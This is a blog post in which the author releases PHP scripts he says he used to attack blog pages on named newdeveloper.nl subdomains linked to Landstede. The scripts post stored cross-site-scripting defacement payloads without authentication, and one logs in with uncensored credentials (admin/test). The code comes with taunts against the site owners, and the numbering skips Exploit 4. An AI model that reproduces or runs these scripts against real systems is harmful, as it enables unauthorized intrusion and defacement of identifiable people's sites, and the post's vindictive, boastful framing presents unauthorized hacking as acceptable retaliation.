Exploit codes used against Landstede

Hey G33ks,So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes :)
It were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, password etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:

Exploit 1 - April 24 2017

Authentication is a luxury?

<?php
/*
* Exploit by FinlayDaG33k
* https://aberg.newdeveloper.nl/pages/blog.php
*//*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');$ch = curl_init();curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);curl_close ($ch);
echo "Exploit send!";
?>

Exploit 2 - May 1 2017

Using username `admin` and password `test` is generally not a good idea on a website facing the whole world...

<?php
/*
* Exploit by FinlayDaG33k
* https://aberg.newdeveloper.nl/pages/blog.php
*//*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/ /* Move this comment line to enable the script */
$message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');$cookiefile = DIRNAME(__FILE__) . '/cookies.txt';
$f = fopen($cookiefile, "w");
fclose($f);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '-');
curl_setopt($ch, CURLOPT_VERBOSE, true);
$http_headers = array(
'Host: aberg.newdeveloper.nl',
'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
'Accept: */*',
'Accept-Language: en-us,en;q=0.5',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Connection: keep-alive'
);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $http_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$result = curl_exec ($ch); // Authenticate ourselves!$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($result, 0, $header_size);
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_exec ($ch);
curl_close ($ch);
*/?>
Exploit send!

Exploit 3 - May 4 2017

This guy trashtalked I wouldn't be able to exploit his site, well, it worked anyways (hint: he got pissed) :)

<?php
/*
* Exploit by FinlayDaG33k
* https://cschotman.newdeveloper.nl/pages/blog.php
*//*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/
$message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');$postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
curl_close ($ch);print_r($result);
echo "Exploit send!";
?>

Exploit 5 - May 4 2017 (same as Exploit #1, but against different target)

How was this one even possible?
I already exploited a site using the same mistake...
This one got them really mad btw :mrgreen:

<?php
/*
* Exploit by FinlayDaG33k
* https://pmetz.newdeveloper.nl/pages/blog.php
*//*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');$ch = curl_init();curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);curl_close ($ch);
echo "Exploit send!";
?>
 
 
Well, there ya have it :)
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now...[g33kout]

Comments


Leave a comment


Please login to leave comment!